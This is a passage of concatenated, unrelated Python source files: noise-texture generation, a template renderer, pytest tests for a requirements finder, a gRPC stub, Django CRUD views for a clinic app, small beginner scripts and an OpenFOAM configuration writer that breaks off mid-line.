= self.getGradientIndex(qx0, qy0) q01 = self.getGradientIndex(qx1, qy0) q10 = self.getGradientIndex(qx0, qy1) q11 = self.getGradientIndex(qx1, qy1) tx0 = x - math.floor(x) tx1 = tx0 - 1 ty0 = y - math.floor(y) ty1 = ty0 - 1 v00 = self.gradients[q00][0] * tx0 + self.gradients[q00][1] * ty0 v01 = self.gradients[q01][0] * tx1 + self.gradients[q01][1] * ty0 v10 = self.gradients[q10][0] * tx0 + self.gradients[q10][1] * ty1 v11 = self.gradients[q11][0] * tx1 + self.gradients[q11][1] * ty1 wx = tx0 * tx0 * (3 - 2 * tx0) v0 = v00 + wx * (v01 - v00) v1 = v10 + wx * (v11 - v10) wy = ty0 * ty0 * (3 - 2 * ty0) return (v0 + wy * (v1 - v0)) * 0.5 + 1 def makeTexture(self, canshu1,canshu2,canshu3,texture = None): if texture is None: texture = self.cloud noise = {} max = min = None for i in range(self.imageLen): for j in range(self.imageWid): value = texture(i, j,canshu1,canshu2,canshu3,noise=None) noise[i, j] = value if max is None or max < value: max = value if min is None or min > value: min = value for i in range(self.imageLen): for j in range(self.imageWid): self.img[i, j] = (int) ((noise[i, j] - min) / (max - min) * 255 ) def fractalBrownianMotion(self, x, y, func,octaves,persistence,canshu): # octaves = 12 amplitude = 1.0 frequency = 1.0 / self.imageWid # persistence = 0.5 value = 0.0 for k in range(octaves): value += func(x * frequency, y * frequency) * amplitude frequency *= canshu amplitude *= persistence return value def wood(self, x, y,canshu1,canshu2,canshu3, noise = None): if noise is None: noise = self.perlinNoise frequency = 1.0 / self.imageWid n = noise(canshu1 * x * frequency, canshu2 * y * frequency) * canshu3 return n - int(n)
python
VERSION = '0.1.7'
python
# -*- coding: utf-8 -*- from __future__ import print_function from io import StringIO from dktemplate.parse import nest from dktemplate.tokenize import tokenize class Render(object): def __init__(self, content): self.content = content self.out = StringIO() self.curlevel = 0 def value(self): return self.out.getvalue() def render(self, item=None): if item is None: item = self.content[0] tag = item[0] if tag.startswith('block:'): tag = 'block' #print '[I]', item, 'CALLING:', getattr(self, 'render_' + tag).__name__ , item try: getattr(self, 'render_' + tag)(item) except: print('='*80) print(self.out.getvalue()) raise def render_block(self, block): print("{%% %s %%}" % block[0], file=self.out) if len(block) > 1: for item in block[1]: self.render(item) print("{%% end%s %%}" % block[0], file=self.out) def render_tag(self, tag): print("{%% %s %%}" % (' '.join(tag[1:])), file=self.out) def render_val(self, item): print("{{ %s }}" % item[1], file=self.out) def render(txt, fname=None): item = [nest(tokenize(txt), fname)] r = Render("") r.render(item) return r.value()
python
def findDuplicate(string): list =[] for i in string: if i not in list and string.count(i) > 1: list.append(i) return list n=input('Enter String : ') print('Duplicate characters :',findDuplicate(n))
python
# Copyright 2020 Tyler Calder import collections import contextlib import io import unittest.mock import os import subprocess import sys import pytest from pytest_mock import mocker sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), ".."))) import _realreq.realreq as realreq CONTENT = """ import os import requests from foo import bar from . import local_module import local_module2 from foo.baz import frum import abbrev import src.local_module """ MOCK_ALIASES = {"abbrev": "abbreviation"} realreq.ALIASES = MOCK_ALIASES _MOCK_DEPENDENCY_TREE = { "foo": ["bar"], "requests": ["baz", "spam"], "baz": [], "spam": ["egg", "wheel"], "egg": ["pip"], "pip": [], "wheel": [], "abbreviation": [], } _MOCK_DEP_VERSIONS = { "foo": "1.0.0", "baz": "0.1.0", "spam": "3.2.12", "egg": "13.0", "pip": "2.12.1", "wheel": "1.1.1", "notused": "201.10.1", "DevDep": "0.1.1", "testDep": "0.1.3", "abbreviation": "1.2.1", "requests": "0.2.0", } _DEEP_DEPENDENCIES = collections.OrderedDict( [ ("abbreviation", "1.2.1"), ("baz", "0.1.0"), ("egg", "13.0"), ("foo", "1.0.0"), ("pip", "2.12.1"), ("requests", "0.2.0"), ("spam", "3.2.12"), ("wheel", "1.1.1"), ] ) _SHALLOW_DEPENDENCIES = collections.OrderedDict( [ ("abbreviation", "1.2.1"), ("foo", "1.0.0"), ("requests", "0.2.0"), ] ) def mock_pip_show(*args, **kwargs): pkg = args[0][2] try: deps = _MOCK_DEPENDENCY_TREE[pkg] except KeyError: raise subprocess.CalledProcessError(1, cmd="Test Command") mock_result = unittest.mock.MagicMock() mock_result.configure_mock( **{ "stdout": "stuff\nRequires: {0}\nmore stuff".format( ", ".join(deps) ).encode() } ) return mock_result def mock_pip_freeze(*args, **kwargs): result = b"\n".join( ["{0}=={1}".format(k, v).encode() for k, v in _MOCK_DEP_VERSIONS.items()] ) mock_result = unittest.mock.MagicMock() mock_result.configure_mock(**{"stdout": result}) return mock_result def mock_subprocess_run(*args, **kwargs): """Mock calls to subprocess by routing them to the right mock""" command = args[0][1] if command == "show": return mock_pip_show(*args, **kwargs) elif command == "freeze": return mock_pip_freeze(*args, **kwargs) @pytest.fixture(scope="session", params=["src", "path/to/src"]) def source_files( tmp_path_factory, request, ): """Creates a temp directory that tests different source files returns: path to directory being used for test """ path = os.path.normpath(request.param) paths = path.split("/") if len(paths) > 1 and isinstance(paths, list): src = tmp_path_factory.mktemp(path[0], numbered=False) for p in paths: src = src / p src.mkdir() else: src = tmp_path_factory.mktemp(path, numbered=False) main = src / "main.py" main.write_text(CONTENT) return src def test_search_source_for_used_packages(source_files): """Source code is searched and aquires the name of all packages used""" pkgs = realreq._search_source(str(source_files)) expected = [ "requests", "foo", "local_module2", "abbreviation", ] assert set(pkgs) == set(expected) def test_build_dependency_list(mocker): """Dependency Tree build out should identify all the dependencies a module has""" # Essentially we want to make sure that the values returned from the system # are what we would get by running `pip show x`, and then getting the "Requires" value mock_run = mocker.patch("subprocess.run") mock_run.side_effect = mock_pip_show pkgs = ["requests", "foo", "local_module2", "abbreviation"] dep_tree = realreq._build_dep_list(pkgs) assert all([_ in dep_tree for _ in list(_MOCK_DEPENDENCY_TREE.keys())]) def test_get_dependency_versions(mocker): """Dependency Versions should return dictionary with packages and versions""" mock_run = mocker.patch("subprocess.run") mock_run.side_effect = mock_pip_freeze pkgs = _MOCK_DEPENDENCY_TREE.keys() versions = realreq._get_dependency_versions(pkgs) assert versions == { "foo": "1.0.0", "baz": "0.1.0", "spam": "3.2.12", "egg": "13.0", "pip": "2.12.1", "wheel": "1.1.1", "abbreviation": "1.2.1", "requests": "0.2.0", } class TestCLI: """Tests for the CLI of realreq""" @pytest.mark.parametrize("s_flag", ["-s", "--source"]) def test_default_flags(self, source_files, mocker, s_flag): args = ["cmd", s_flag, str(source_files)] mocker.patch.object(sys, "argv", args) mock_run = mocker.patch("subprocess.run") mock_run.side_effect = mock_subprocess_run sbuff = io.StringIO() with contextlib.redirect_stdout(sbuff): app = realreq._RealReq() app() sbuff.seek(0) assert sbuff.read() == "".join( "{0}=={1}\n".format(k, v) for k, v in _SHALLOW_DEPENDENCIES.items() ) @pytest.mark.parametrize("s_flag", ["-s", "--source"]) @pytest.mark.parametrize("d_flag", ["-d", "--deep"]) def test_deep_flag(self, source_files, mocker, s_flag, d_flag): args = ["cmd", s_flag, str(source_files), d_flag] mocker.patch.object(sys, "argv", args) mock_run = mocker.patch("subprocess.run") mock_run.side_effect = mock_subprocess_run sbuff = io.StringIO() with contextlib.redirect_stdout(sbuff): app = realreq._RealReq() app() sbuff.seek(0) assert sbuff.read() == "".join( "{0}=={1}\n".format(k, v) for k, v in _DEEP_DEPENDENCIES.items() )
python
#!/usr/bin/env python # -*- coding:UTF-8 -*- ''' @Description: 工具 @Author: Zpp @Date: 2019-10-28 11:28:09 LastEditors: Zpp LastEditTime: 2020-11-24 16:27:50 ''' import platform def IsWindows(): return True if platform.system() == 'Windows' else False def ReadFile(path, type='r'): try: f = open(path, type) content = f.read() f.close() return content except: return False def WriteFile(path, content, type='w'): try: f = open(path, type) f.write(content) f.close() return True except: return False def health_database_status(s, sql): is_db = True try: s.execute(sql) except: is_db = False return is_db
python
# -*- coding: utf-8 -*- import pytest import time import zwutils.dlso as dlso # pylint: disable=no-member def test_dict2obj(): r = dlso.dict2obj({ 'ks': 'v1', 'kn': 2, 'ka': [1, '2'], 'kd': {'1':1, '2':2}, 'knone': None }) r2 = dlso.dict2obj(None) assert r.ks == 'v1' def test_obj2dict(): o = type('', (), {})() o.a1 = 'a' o.a2 = 'b' r = dlso.obj2dict(o) assert r['a1'] == 'a' def test_extend_attr(): b = {'a':'a', 'b':'b'} e = {'b':'bb', 'c':'c', 'd':1} o = dlso.extend_attrs(dlso.dict2obj(b), e) assert o.b == 'bb' and o.c == 'c' and o.d == 1 o = dlso.extend_attrs(b, e) assert o.b == 'bb' and o.c == 'c' and o.d == 1 o = dlso.extend_attrs(dlso.dict2obj(b), dlso.dict2obj(e)) assert o.b == 'bb' and o.c == 'c' and o.d == 1 o = dlso.extend_attrs(None, e) assert o.b == 'bb' and o.c == 'c' and o.d == 1 o = dlso.extend_attrs(dlso.dict2obj(b), None) assert o.a == 'a' and o.b == 'b' def test_update_attrs(): b = {'a':'a', 'b':'b'} e = {'b':'bb', 'c':'c'} o = dlso.update_attrs(dlso.dict2obj(b), e) assert o.b == 'bb' and not hasattr(o, 'c') o = dlso.update_attrs(b, e) assert o.b == 'bb' and not hasattr(o, 'c') o = dlso.update_attrs(dlso.dict2obj(b), dlso.dict2obj(e)) assert o.b == 'bb' and not hasattr(o, 'c') o = dlso.update_attrs(None, e) assert not hasattr(o, 'b') and not hasattr(o, 'c') o = dlso.update_attrs(dlso.dict2obj(b), None) assert o.a == 'a' and o.b == 'b' def test_upsert_config(): pcfg = type('', (), {})() pcfg.a = 'o' dcfg = {'a': 'd', 'da':'da', 'n1':{'nn1': {'nnn1': 'nnn1'}, 'nn2': 'nn2' } } ncfg = {'a': 'n', 'na':'na'} pmcfg = {'a': 'p','pa':'pa'} cfg = dlso.upsert_config(pcfg, dcfg, ncfg, pmcfg) assert id(cfg) == id(pcfg) and cfg.a == 'p' and hasattr(cfg, 'pa') and cfg.n1.nn1.nnn1 == 'nnn1' def test_list_split(): r = dlso.list_split(list(range(11)), 3) assert len(r) == 3 r = dlso.list_split(list(range(5)), 6) assert len(r) == 5 def test_list_compare(): assert False == dlso.list_compare([1,2,3,3], [1,2,2,3]) assert True == dlso.list_compare([1,2,3], [2,1,3])
python
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT! import grpc import environment.grpc.jobshop_pb2 as jobshop__pb2 class EnvironmentStub(object): """Missing associated documentation comment in .proto file""" def __init__(self, channel): """Constructor. Args: channel: A grpc.Channel. """ self.ApplyAction = channel.unary_unary( '/env.Environment/ApplyAction', request_serializer=jobshop__pb2.MasAction.SerializeToString, response_deserializer=jobshop__pb2.MasActionResponse.FromString, ) self.Reset = channel.unary_unary( '/env.Environment/Reset', request_serializer=jobshop__pb2.Empty.SerializeToString, response_deserializer=jobshop__pb2.MasState.FromString, ) self.Render = channel.unary_unary( '/env.Environment/Render', request_serializer=jobshop__pb2.Empty.SerializeToString, response_deserializer=jobshop__pb2.Empty.FromString, ) self.SetSeed = channel.unary_unary( '/env.Environment/SetSeed', request_serializer=jobshop__pb2.Seed.SerializeToString, response_deserializer=jobshop__pb2.Empty.FromString, ) self.Setup = channel.unary_unary( '/env.Environment/Setup', request_serializer=jobshop__pb2.SettingsMsg.SerializeToString, response_deserializer=jobshop__pb2.SetupMsg.FromString, ) class EnvironmentServicer(object): """Missing associated documentation comment in .proto file""" def ApplyAction(self, request, context): """Apply an action to all agents """ context.set_code(grpc.StatusCode.UNIMPLEMENTED) context.set_details('Method not implemented!') raise NotImplementedError('Method not implemented!') def Reset(self, request, context): """Reset the environment """ context.set_code(grpc.StatusCode.UNIMPLEMENTED) context.set_details('Method not implemented!') raise NotImplementedError('Method not implemented!') def Render(self, request, context): """Show GUI """ context.set_code(grpc.StatusCode.UNIMPLEMENTED) context.set_details('Method not implemented!') raise NotImplementedError('Method not implemented!') def SetSeed(self, request, context): """Set the env seed """ context.set_code(grpc.StatusCode.UNIMPLEMENTED) context.set_details('Method not implemented!') raise NotImplementedError('Method not implemented!') def Setup(self, request, context): """Set and get Settings """ context.set_code(grpc.StatusCode.UNIMPLEMENTED) context.set_details('Method not implemented!') raise NotImplementedError('Method not implemented!') def add_EnvironmentServicer_to_server(servicer, server): rpc_method_handlers = { 'ApplyAction': grpc.unary_unary_rpc_method_handler( servicer.ApplyAction, request_deserializer=jobshop__pb2.MasAction.FromString, response_serializer=jobshop__pb2.MasActionResponse.SerializeToString, ), 'Reset': grpc.unary_unary_rpc_method_handler( servicer.Reset, request_deserializer=jobshop__pb2.Empty.FromString, response_serializer=jobshop__pb2.MasState.SerializeToString, ), 'Render': grpc.unary_unary_rpc_method_handler( servicer.Render, request_deserializer=jobshop__pb2.Empty.FromString, response_serializer=jobshop__pb2.Empty.SerializeToString, ), 'SetSeed': grpc.unary_unary_rpc_method_handler( servicer.SetSeed, request_deserializer=jobshop__pb2.Seed.FromString, response_serializer=jobshop__pb2.Empty.SerializeToString, ), 'Setup': grpc.unary_unary_rpc_method_handler( servicer.Setup, request_deserializer=jobshop__pb2.SettingsMsg.FromString, response_serializer=jobshop__pb2.SetupMsg.SerializeToString, ), } generic_handler = grpc.method_handlers_generic_handler( 'env.Environment', rpc_method_handlers) server.add_generic_rpc_handlers((generic_handler,)) # This class is part of an EXPERIMENTAL API. class Environment(object): """Missing associated documentation comment in .proto file""" @staticmethod def ApplyAction(request, target, options=(), channel_credentials=None, call_credentials=None, compression=None, wait_for_ready=None, timeout=None, metadata=None): return grpc.experimental.unary_unary(request, target, '/env.Environment/ApplyAction', jobshop__pb2.MasAction.SerializeToString, jobshop__pb2.MasActionResponse.FromString, options, channel_credentials, call_credentials, compression, wait_for_ready, timeout, metadata) @staticmethod def Reset(request, target, options=(), channel_credentials=None, call_credentials=None, compression=None, wait_for_ready=None, timeout=None, metadata=None): return grpc.experimental.unary_unary(request, target, '/env.Environment/Reset', jobshop__pb2.Empty.SerializeToString, jobshop__pb2.MasState.FromString, options, channel_credentials, call_credentials, compression, wait_for_ready, timeout, metadata) @staticmethod def Render(request, target, options=(), channel_credentials=None, call_credentials=None, compression=None, wait_for_ready=None, timeout=None, metadata=None): return grpc.experimental.unary_unary(request, target, '/env.Environment/Render', jobshop__pb2.Empty.SerializeToString, jobshop__pb2.Empty.FromString, options, channel_credentials, call_credentials, compression, wait_for_ready, timeout, metadata) @staticmethod def SetSeed(request, target, options=(), channel_credentials=None, call_credentials=None, compression=None, wait_for_ready=None, timeout=None, metadata=None): return grpc.experimental.unary_unary(request, target, '/env.Environment/SetSeed', jobshop__pb2.Seed.SerializeToString, jobshop__pb2.Empty.FromString, options, channel_credentials, call_credentials, compression, wait_for_ready, timeout, metadata) @staticmethod def Setup(request, target, options=(), channel_credentials=None, call_credentials=None, compression=None, wait_for_ready=None, timeout=None, metadata=None): return grpc.experimental.unary_unary(request, target, '/env.Environment/Setup', jobshop__pb2.SettingsMsg.SerializeToString, jobshop__pb2.SetupMsg.FromString, options, channel_credentials, call_credentials, compression, wait_for_ready, timeout, metadata)
python
import os class Config: """ Parent configuration class. """ DEBUG = False TESTING = False CSRF_ENABLED = True SECRET = os.getenv('SECRET') TITLE = "Test API" VERSION = "1.0" DESCRIPTION = "Demo API."
python
# coding=utf-8 from app.api.base.base_router import BaseRouter from app.config.config import HEADER from app.api.src.geo.provider import Provider class GeoTypesRoute(BaseRouter): def __init__(self): super().__init__() def get(self): answer = Provider().get_types() return answer, HEADER def options(self): return "OK", 200, {'Access-Control-Allow-Origin': '*', 'Access-Control-Allow-Methods': 'GET,POST,DELETE,PUT,OPTIONS', 'Access-Control-Allow-Headers': 'X-Requested-With,Content-Type'}
python
from django.contrib.messages.views import SuccessMessageMixin from django.contrib import messages from django.http import HttpResponseRedirect from django.views.generic import ListView, DetailView from django.views.generic.edit import UpdateView, DeleteView, CreateView from django.urls import reverse_lazy from .forms import * from django.db.models import Q class FuncaoListView(ListView): model = Funcao template_name = 'funcao/funcao_list.html' context_object_name = "funcoes" paginate_by = 10 def get_queryset(self): query = self.request.GET.get('search', None) if query: object_list = Funcao.objects.filter( Q(nome_funcao__icontains=query) | Q(cbo__icontains=query) ) else: object_list = Funcao.objects.all() return object_list class FuncaoDetailView(DetailView): model = Funcao template_name = 'funcao/detail.html' class FuncaoCreateView(SuccessMessageMixin, CreateView): form_class = FuncaoForm template_name = 'funcao/create.html' success_url = reverse_lazy('public:funcao_create') success_message = "Função cadastrada com sucesso!" def form_valid(self, form): self.object = form.save(commit=False) self.object.idusuariocadastro = self.request.user.id messages.success(self.request, self.success_message) # obs: antes era obj.__dict__ impria o objeto inteiro self.object.save() return HttpResponseRedirect(self.get_success_url()) class FuncaoUpdateView(SuccessMessageMixin, UpdateView): model = Funcao form_class = FuncaoForm template_name = 'funcao/edit.html' success_url = reverse_lazy('public:funcao_list') success_message = "Função Editada com sucesso!" def form_valid(self, form): self.object = form.save(commit=False) self.object.idusuarioedicao = self.request.user.id messages.success(self.request, self.success_message) # obs: antes era obj.__dict__ impria o objeto inteiro self.object.save() return HttpResponseRedirect(self.get_success_url()) class FuncaoDeleteView(SuccessMessageMixin, DeleteView): model = Funcao template_name = 'funcao/delete.html' success_url = reverse_lazy('public:funcao_list') success_message = "A função %s foi apagada com sucesso!" def delete(self, request, *args, **kwargs): obj = self.get_object() messages.success(self.request, self.success_message % obj.nome_funcao) #obs: antes era obj.__dict__ impria o objeto inteiro return super(FuncaoDeleteView, self).delete(request, *args, **kwargs) ################################################## EMPRESA #################################################### class EmpresaListView(ListView): model = Empresa template_name = 'empresa/empresa_list.html' context_object_name = "empresas" paginate_by = 10 def get_queryset(self): query = self.request.GET.get('search', None) if query: object_list = Empresa.objects.filter( Q(nome_empresa__icontains=query) | Q(cnpj__icontains=query) ) else: object_list = Empresa.objects.all() return object_list class EmpresaCreateView(SuccessMessageMixin, CreateView): form_class = EmpresaForm template_name = 'empresa/create.html' success_url = reverse_lazy('public:empresa_create') success_message = "Empresa cadastrada com sucesso!" def form_valid(self, form): self.object = form.save(commit=False) self.object.idusuariocadastro = self.request.user.id messages.success(self.request, self.success_message) # obs: antes era obj.__dict__ impria o objeto inteiro self.object.save() return HttpResponseRedirect(self.get_success_url()) class EmpresaDetailView(DetailView): model = Empresa template_name = 'empresa/detail.html' class EmpresaUpdateView(SuccessMessageMixin, UpdateView): model = Empresa form_class = EmpresaForm template_name = 'empresa/edit.html' success_url = reverse_lazy('public:empresa_list') success_message = "Empresa Editada com sucesso!" def form_valid(self, form): self.object = form.save(commit=False) self.object.idusuarioedicao = self.request.user.id messages.success(self.request, self.success_message) # obs: antes era obj.__dict__ impria o objeto inteiro self.object.save() return HttpResponseRedirect(self.get_success_url()) class EmpresaDeleteView(SuccessMessageMixin, DeleteView): model = Empresa template_name = 'empresa/delete.html' success_url = reverse_lazy('public:empresa_list') success_message = "A Empresa %s foi apagada com sucesso!" def delete(self, request, *args, **kwargs): obj = self.get_object() messages.success(self.request, self.success_message % obj.nome_empresa) #obs: antes era obj.__dict__ impria o objeto inteiro return super(EmpresaDeleteView, self).delete(request, *args, **kwargs) ################################################## PACIENTE #################################################### class PacienteListView(ListView): model = Paciente template_name = 'paciente/paciente_list.html' context_object_name = "pacientes" paginate_by = 10 def get_queryset(self): query = self.request.GET.get('search', None) if query: object_list = Paciente.objects.filter( Q(nome_paciente__icontains=query) | Q(cpf__icontains=query) ) else: object_list = Paciente.objects.all() return object_list class PacienteCreateView(SuccessMessageMixin, CreateView): form_class = PacienteForm template_name = 'paciente/create.html' success_url = reverse_lazy('public:paciente_create') success_message = "Paciente cadastrado com sucesso!" def form_valid(self, form): self.object = form.save(commit=False) self.object.idusuariocadastro = self.request.user.id messages.success(self.request, self.success_message) # obs: antes era obj.__dict__ impria o objeto inteiro self.object.save() return HttpResponseRedirect(self.get_success_url()) class PacienteDetailView(DetailView): model = Paciente template_name = 'paciente/detail.html' class PacienteUpdateView(SuccessMessageMixin, UpdateView): model = Paciente form_class = PacienteForm template_name = 'paciente/edit.html' success_url = reverse_lazy('public:paciente_list') success_message = "Paciente Editado com sucesso!" def form_valid(self, form): self.object = form.save(commit=False) self.object.idusuarioedicao = self.request.user.id messages.success(self.request, self.success_message) # obs: antes era obj.__dict__ impria o objeto inteiro self.object.save() return HttpResponseRedirect(self.get_success_url()) class PacienteDeleteView(SuccessMessageMixin, DeleteView): model = Paciente template_name = 'paciente/delete.html' success_url = reverse_lazy('public:paciente_list') success_message ="O Paciente %s foi apagada com sucesso!" def delete(self, request, *args, **kwargs): obj = self.get_object() messages.success(self.request, self.success_message % obj.nome_paciente) #obs: antes era obj.__dict__ impria o objeto inteiro return super(PacienteDeleteView, self).delete(request, *args, **kwargs) ################################################## exame #################################################### class ExameListView(ListView): model = Exame template_name = 'exame/exame_list.html' context_object_name = "exames" paginate_by = 10 def get_queryset(self): query = self.request.GET.get('search', None) if query: object_list = Exame.objects.filter( Q(nome_exame__icontains=query) ) else: object_list = Exame.objects.all() return object_list class ExameCreateView(SuccessMessageMixin, CreateView): form_class = ExameForm template_name = 'exame/create.html' success_url = reverse_lazy('public:exame_create') success_message = "Exame cadastrado com sucesso!" # def moeda(valor): # print(valor) # valor = valor.replace('.', '') # valor = valor.replace(',', '.') # return Decimal(valor) # return valor def form_valid(self, form): # print('aki 2') # self.valor_colaborador = 6.0 #self.valor_ems = 12.00 self.object = form.save(commit=False) # print(self.object.valor_colaborador) # self.object.valor_exame = ExameCreateView.moeda(self.object.valor_colaborador) self.object.idusuariocadastro = self.request.user.id messages.success(self.request, self.success_message) # obs: antes era obj.__dict__ impria o objeto inteiro self.object.save() return HttpResponseRedirect(self.get_success_url()) class ExameDetailView(DetailView): model = Exame template_name = 'exame/detail.html' class ExameUpdateView(SuccessMessageMixin, UpdateView): model = Exame form_class = ExameForm template_name = 'exame/edit.html' success_url = reverse_lazy('public:exame_list') success_message = "Exame Editado com sucesso!" def form_valid(self, form): self.object = form.save(commit=False) self.object.idusuarioedicao = self.request.user.id messages.success(self.request, self.success_message) # obs: antes era obj.__dict__ impria o objeto inteiro self.object.save() return HttpResponseRedirect(self.get_success_url()) class ExameDeleteView(SuccessMessageMixin, DeleteView): model = Exame template_name = 'exame/delete.html' success_url = reverse_lazy('public:exame_list') success_message ="O Exame %s foi apagada com sucesso!" def delete(self, request, *args, **kwargs): obj = self.get_object() messages.success(self.request, self.success_message % obj.nome_exame) #obs: antes era obj.__dict__ impria o objeto inteiro return super(PacienteDeleteView, self).delete(request, *args, **kwargs) ################################################## ESPECIALIDADE MEDICA #################################################### class EspecialidadeMedicaListView(ListView): model = EspecialidadeMedica template_name = 'especialidademedica/especialidademedica_list.html' context_object_name = "especialidademedicas" paginate_by = 5 def get_queryset(self): query = self.request.GET.get('search', None) if query: object_list = EspecialidadeMedica.objects.filter( Q(especialidade_medica__icontains=query) ) else: object_list = EspecialidadeMedica.objects.all() return object_list class EspecialidadeMedicaCreateView(SuccessMessageMixin, CreateView): form_class = EspecialiadeMedicaForm template_name = 'especialidademedica/create.html' success_url = reverse_lazy('public:especialidademedica_create') success_message = "Especialidade Medica cadastrado com sucesso!" def form_valid(self, form): self.object = form.save(commit=False) self.object.idusuariocadastro = self.request.user.id messages.success(self.request, self.success_message) # obs: antes era obj.__dict__ impria o objeto inteiro self.object.save() return HttpResponseRedirect(self.get_success_url()) class EspecialidadeMedicaDetailView(DetailView): model = EspecialidadeMedica template_name = 'especialidademedica/detail.html' class EspecialidadeMedicaUpdateView(SuccessMessageMixin, UpdateView): model = EspecialidadeMedica form_class = EspecialiadeMedicaForm template_name = 'especialidademedica/edit.html' success_url = reverse_lazy('public:especialidademedica_list') success_message = "Especialidade Medica Editado com sucesso!" def form_valid(self, form): self.object = form.save(commit=False) self.object.idusuarioedicao = self.request.user.id messages.success(self.request, self.success_message) # obs: antes era obj.__dict__ impria o objeto inteiro self.object.save() return HttpResponseRedirect(self.get_success_url()) class EspecialidadeMedicaDeleteView(SuccessMessageMixin, DeleteView): model = EspecialidadeMedica template_name = 'especialidademedica/delete.html' success_url = reverse_lazy('public:especialidademedica_list') success_message ="A Especialidade Medica %s foi apagada com sucesso!" def delete(self, request, *args, **kwargs): obj = self.get_object() messages.success(self.request, self.success_message % obj.especialidade_medica) #obs: antes era obj.__dict__ impria o objeto inteiro return super(EspecialidadeMedicaDeleteView, self).delete(request, *args, **kwargs) ################################################## PRESTADOR DE SERVIÇO #################################################### class PrestadorServicoListView(ListView): model = PrestadorServico template_name = 'prestadorservico/prestadorservico_list.html' context_object_name = "prestadorservicos" paginate_by = 5 def get_queryset(self): query = self.request.GET.get('search', None) if query: object_list = PrestadorServico.objects.filter( Q(nome_prestador__icontains=query) ) else: object_list = PrestadorServico.objects.all() return object_list class PrestadorServicoCreateView(SuccessMessageMixin, CreateView): form_class = PrestadorServicoForm template_name = 'prestadorservico/create.html' success_url = reverse_lazy('public:prestadorservico_create') success_message = "Prestador Serviço cadastrado com sucesso!" def form_valid(self, form): self.object = form.save(commit=False) self.object.idusuariocadastro = self.request.user.id messages.success(self.request, self.success_message) # obs: antes era obj.__dict__ impria o objeto inteiro self.object.save() return HttpResponseRedirect(self.get_success_url()) class PrestadorServicoDetailView(DetailView): model = PrestadorServico template_name = 'prestadorservico/detail.html' class PrestadorServicoUpdateView(SuccessMessageMixin, UpdateView): model = PrestadorServico form_class = PrestadorServicoForm template_name = 'prestadorservico/edit.html' success_url = reverse_lazy('public:prestadorservico_list') success_message = "Prestador de Serviço Editado com sucesso!" def form_valid(self, form): self.object = form.save(commit=False) self.object.idusuarioedicao = self.request.user.id messages.success(self.request, self.success_message) # obs: antes era obj.__dict__ impria o objeto inteiro self.object.save() return HttpResponseRedirect(self.get_success_url()) class PrestadorServicoDeleteView(SuccessMessageMixin, DeleteView): model = PrestadorServico template_name = 'prestadorservico/delete.html' success_url = reverse_lazy('public:prestadorservico_list') success_message ="O Prestador de Serviço %s foi apagado com sucesso!" def delete(self, request, *args, **kwargs): obj = self.get_object() messages.success(self.request, self.success_message % obj.nome_prestador) #obs: antes era obj.__dict__ impria o objeto inteiro return super(PrestadorServicoDeleteView, self).delete(request, *args, **kwargs)
python
nome = str(input("Qual é seu nome")).lower().strip() if nome == "gustavo": print("Que nome bonito") elif nome == "pedro" or nome == "maria" or nome == "joão": print ("O seu nome é bem popular") elif nome == "ana katarina": print ("que nome feio") else: print("Seu nome é bem chato")
python
from .jsonexporter import JSONExporter from .ymlexporter import YMLExporter
python
from __future__ import absolute_import, division, print_function, unicode_literals import math import random import time from echomesh.sound import Level from echomesh.util.registry.Registry import Registry class _SystemFunction(object): def __init__(self, function, is_constant): self.function = function self.is_constant = is_constant _REGISTRY = Registry('System functions') def register(name, function, is_constant): _REGISTRY.register(_SystemFunction(function, is_constant), name) register('e', math.e, True) register('level', Level.input_level, False) register('pi', math.pi, True) register('random', random.random, False) register('time', time.time, False) get = _REGISTRY.get
python
print('=====QUANTO DE TINTA?=====') alt = float(input('Qual a altura da parede?')) lar = float(input('Qual a largura da parede?')) area = alt*lar print('A área da parede é de {:.2f}m²!'.format(area)) print('Serão necessários {} litros de tinta para pintar a parede'.format(area/2))
python
######################################################################### # # # C R A N F I E L D U N I V E R S I T Y # # 2 0 1 9 / 2 0 2 0 # # # # MSc in Aerospace Computational Engineering # # # # Group Design Project # # # # Driver File for the OpenFoam Automated Tool Chain # # Flow Past Cylinder Test Case # # # #-----------------------------------------------------------------------# # # # Main Contributors: # # Vadim Maltsev (Email: [email protected]) # # Samali Liyanage (Email: [email protected]) # # Elias Farah (Email: [email protected]) # # Supervisor: # # Dr. Tom-Robin Teschner (Email: [email protected] ) # # # ######################################################################### from __future__ import division class genForceCoeffsFile: #parameters: Parameters specified in the main driver #rasModel: if the simulation is turbulent then specify the RAS model def __init__(self, parameters): self.parameters = parameters self.Diam = parameters['Diam'] self.U = parameters['U'] self.geometry = 'cylinder' self.thick = parameters['thickness'] self.CofR = [10*self.Diam, 10*self.Diam, self.thick/2] self.lRef = self.Diam if parameters["topology"] == "2D": self.Aref = self.Diam * 0.5 elif parameters["topology"] == "3D": self.Aref = self.Diam * self.thick self.liftDir = [0, 1, 0] self.dragDir = [1, 0, 0] self.pitchAxis = [0, 0, 1] def writeForceCoeffsFile(self): forceCoeffsFile = open("forceCoeffs", "w") forceCoeffsFile.write("/*--------------------------------*-C++-*------------------------------*\\") forceCoeffsFile.write("\n| ========== | |") forceCoeffsFile.write("\n| \\\\ / F ield | OpenFoam: The Open Source CFD Tooolbox |") forceCoeffsFile.write("\n| \\\\ / O peration | Version: check the installation |") forceCoeffsFile.write("\n| \\\\ / A nd | Website: www.openfoam.com |") forceCoeffsFile.write("\n| \\\\/ M anipulation | |") forceCoeffsFile.write("\n\\*---------------------------------------------------------------------*/") forceCoeffsFile.write("\n\nforceCoeffs1") forceCoeffsFile.write("\n{") forceCoeffsFile.write("\n type forceCoeffs;") forceCoeffsFile.write('\n libs ("libforces.so");') forceCoeffsFile.write("\n writeControl timeStep;") forceCoeffsFile.write("\n timeInterval 1;") forceCoeffsFile.write("\n log yes;") forceCoeffsFile.write("\n pRef 0;") forceCoeffsFile.write("\n patches (" + self.geometry + ");") forceCoeffsFile.write("\n rho rhoInf;") forceCoeffsFile.write("\n rhoInf "+ str(self.parameters['rho']) +";") forceCoeffsFile.write("\n liftDir (" + str(self.liftDir[0]) + " " + str(self.liftDir[1]) + " " + str(self.liftDir[2]) + ");") forceCoeffsFile.write("\n dragDir (" + str(self.dragDir[0]) + " " + str(self.dragDir[1]) + " " + str(self.dragDir[2]) + ");") forceCoeffsFile.write("\n CofR (" + str(self.CofR[0]) + " " + str(self.CofR[1]) + " " + str(self.CofR[2]) + ");") forceCoeffsFile.write("\n pitchAxis (" + str(self.pitchAxis[0]) + " 